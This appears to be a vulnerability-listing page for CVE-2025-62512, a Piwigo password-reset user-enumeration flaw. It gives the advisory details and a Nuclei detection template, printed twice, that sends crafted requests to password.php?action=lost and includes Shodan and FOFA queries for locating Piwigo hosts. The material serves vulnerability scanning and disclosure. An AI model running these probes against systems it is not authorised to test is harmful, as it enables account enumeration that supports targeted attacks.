Piwigo - User Enumeration via Password Reset

CVE-2025-62512

Verified

Description

Piwigo is an open source photo gallery application for the web. In version 15.5.0 and likely earlier 15.x releases, the password reset functionality in Piwigo allows an unauthenticated attacker to determine whether a given username or email address exists in the system. The endpoint at password.php?action=lost returns distinct messages for valid vs. invalid accounts, enabling user enumeration. As of time of publication, no known patches are available.

Severity

Medium

CVSS Score

5.3

Exploit Probability

Affected Product

piwigo

Published Date

March 24, 2026

Template Author

dhiyaneshdk

CVE-2025-62512.yaml

id: CVE-2025-62512

info:
  name: Piwigo - User Enumeration via Password Reset
  author: DhiyaneshDk
  severity: medium
  description: |
    Piwigo is an open source photo gallery application for the web. In version 15.5.0 and likely earlier 15.x releases, the password reset functionality in Piwigo allows an unauthenticated attacker to determine whether a given username or email address exists in the system. The endpoint at password.php?action=lost returns distinct messages for valid vs. invalid accounts, enabling user enumeration. As of time of publication, no known patches are available.
  impact: |
    Unauthenticated attackers can enumerate valid usernames or email addresses, aiding further targeted attacks.
  remediation: |
    Update to the latest version when available or apply mitigations to unify response messages.
  reference:
    - https://github.com/Piwigo/Piwigo/security/advisories/GHSA-h4wx-7m83-xfxc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-62512
    epss-score: 0.02263
    epss-percentile: 0.84703
    cwe-id: CWE-204
  metadata:
    verified: true
    max-request: 2
    vendor: piwigo
    product: piwigo
    shodan-query: http.html:"Piwigo"
    fofa-query: body="Piwigo"
  tags: cve,cve2025,piwigo,user-enum,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /password.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'name="pwg_token"\s+value="([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /password.php?action=lost HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pwg_token={{token}}&username_or_email=nonexistent-{{rand_int(10000,99999)}}@example.com&submit=Change+my+password

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Invalid username or email"

      - type: status
        status:
          - 200
# digest: 490a004630440220346f842bb2ab50dc16edb2abe3bf351908668576707d042e5078ee039d0538e4022014e0ba64ec0a0d1ed5455a30fdf37888c759616fe50b0d998988536a5d59d11f:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2025-62512

CWE ID:

cwe-204

References

https://github.com/Piwigo/Piwigo/security/advisories/GHSA-h4wx-7m83-xfxc

Remediation Steps

Update to the latest version when available or apply mitigations to unify response messages.

Description

id: CVE-2025-62512

info:
  name: Piwigo - User Enumeration via Password Reset
  author: DhiyaneshDk
  severity: medium
  description: |
    Piwigo is an open source photo gallery application for the web. In version 15.5.0 and likely earlier 15.x releases, the password reset functionality in Piwigo allows an unauthenticated attacker to determine whether a given username or email address exists in the system. The endpoint at password.php?action=lost returns distinct messages for valid vs. invalid accounts, enabling user enumeration. As of time of publication, no known patches are available.
  impact: |
    Unauthenticated attackers can enumerate valid usernames or email addresses, aiding further targeted attacks.
  remediation: |
    Update to the latest version when available or apply mitigations to unify response messages.
  reference:
    - https://github.com/Piwigo/Piwigo/security/advisories/GHSA-h4wx-7m83-xfxc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-62512
    epss-score: 0.02263
    epss-percentile: 0.84703
    cwe-id: CWE-204
  metadata:
    verified: true
    max-request: 2
    vendor: piwigo
    product: piwigo
    shodan-query: http.html:"Piwigo"
    fofa-query: body="Piwigo"
  tags: cve,cve2025,piwigo,user-enum,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /password.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'name="pwg_token"\s+value="([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /password.php?action=lost HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pwg_token={{token}}&username_or_email=nonexistent-{{rand_int(10000,99999)}}@example.com&submit=Change+my+password

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Invalid username or email"

      - type: status
        status:
          - 200
# digest: 490a004630440220346f842bb2ab50dc16edb2abe3bf351908668576707d042e5078ee039d0538e4022014e0ba64ec0a0d1ed5455a30fdf37888c759616fe50b0d998988536a5d59d11f:922c64590222798bb761d5b6d8e72950

Piwigo - User Enumeration via Password Reset

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Piwigo - User Enumeration via Password Reset

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps